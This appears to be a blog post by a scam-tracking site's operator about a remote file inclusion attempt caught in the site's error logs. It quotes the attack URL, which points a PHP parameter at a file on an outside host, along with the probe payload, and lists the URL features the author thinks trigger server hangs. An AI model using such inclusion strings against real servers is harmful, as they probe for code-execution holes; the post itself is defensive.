There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:
http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?
My banana was once part of a bunch very similar to this one
Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page‘ 
.
In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’ on the sending end.
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?
Analyzing the url gets me to this reduction of required parts:
* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’
will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.
For example, in the following link, everything except ‘www.amazon.com’ is made up
http://www.amazon.com/a.php?b=http://c.gif?
but it still exhibits the same behaviour – WTF is going on?
and why, oh why can’t I detect it in my .htaccess file?
First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.
gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.
Good luck!
_________________________________
Still no replies and it’s still happening…. where have all the gurus gone?
Here’s a little utility I knocked together using Yahoo’s Pipes (http://pipes.yahoo.com/pipes/). It allows you to aggregate, sort and filter feeds from various sources to make one combined info thingy.
Let me know what you think – I can add a couple of extra data feeds in, let me know if you have some to include.
